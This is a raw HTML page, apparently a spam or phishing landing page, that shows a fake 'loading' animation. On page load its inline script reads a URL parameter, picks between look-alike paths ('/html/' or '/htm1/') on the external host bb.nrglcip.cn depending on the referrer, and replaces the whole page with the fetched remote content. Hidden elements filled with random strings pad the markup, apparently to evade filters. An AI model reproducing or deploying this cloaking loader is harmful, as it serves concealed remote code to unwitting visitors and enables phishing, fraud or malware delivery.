<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .hPIskgN {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .hPIskgN .MX4S3nv2jMA {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .hPIskgN .content {
            line-height: 50px;
            text-align: center
        }

        .hPIskgN .img {
            width: 100%
        }

        .hPIskgN .rYcpUu {
            text-align: center
        }

        .hPIskgN .rYcpUu span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .hPIskgN .rYcpUu span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .hPIskgN .rYcpUu span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .hPIskgN .rYcpUu span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .hPIskgN .rYcpUu span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .hPIskgN .rYcpUu span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .hPIskgN .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function MPNojsTiF(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var PNR6wSS = MPNojsTiF('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ PNR6wSS +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ PNR6wSS +".html?a=share";
		}
		
        kMphR9gc=url+"#"+new Date().getTime();
        kMphR9gc && function() {
            $.get(kMphR9gc, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<p  style='display:none'>pqdutPi21C0tt8CfmamLsQOs14YB41nX1Bcp0ARkUiA0VaQzocvsgBQzOtsG</p>
<a  href='#' style='display:none'>GIN58x2GrRfWWOXfelMBSSMdymjwgzroJPpztGkbjqAKmTQgUyHGeXmyjaQGe3qOSLVY6Tsd1RlUnmT3c2HXSjyZpOppNHacZbW</a>
<b style='display:none' >wmFISD3Fk8je67xJpxNqhS0vlOno8wFkk0XfnUHZGHP3ev8mQtHKDtYDRa9D1nldngIU</b>
<ul style='display:none' >XWROpS6i41frsm1vgFuHGPFj4wRxqpTDbEytzzM1MxuLrYywMn74BHUfSFhv7QTmk2hLDl3o0</ul>
<h1 style='display:none' >cHm4ulyxte0JuZ2iOgLlP7k1mbbjLlgag9Nwhc64Bh</h1><div class="hPIskgN">
    <div class="MX4S3nv2jMA">
        <div class="rYcpUu">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>cFDOQj0Qw6Krem6c9bRZwnSDeeD73RIJsFPLzL3iLNU</div>
<ul style='display:none' >wI0LlLdbcx9954PX9dHDWhGVTQaGVgd35HIpk6JG9IzNHyRv9Kzm4KG8Cdf4</ul>
<h1 style='display:none' >uKLR6Zz4vAw6tiBSglK89iKy6J2fr</h1>
<ul style='display:none' >wI0LlLdbcx9954PX9dHDWhGVTQaGVgd35HIpk6JG9IzNHyRv9Kzm4KG8Cdf4</ul></body>
</html>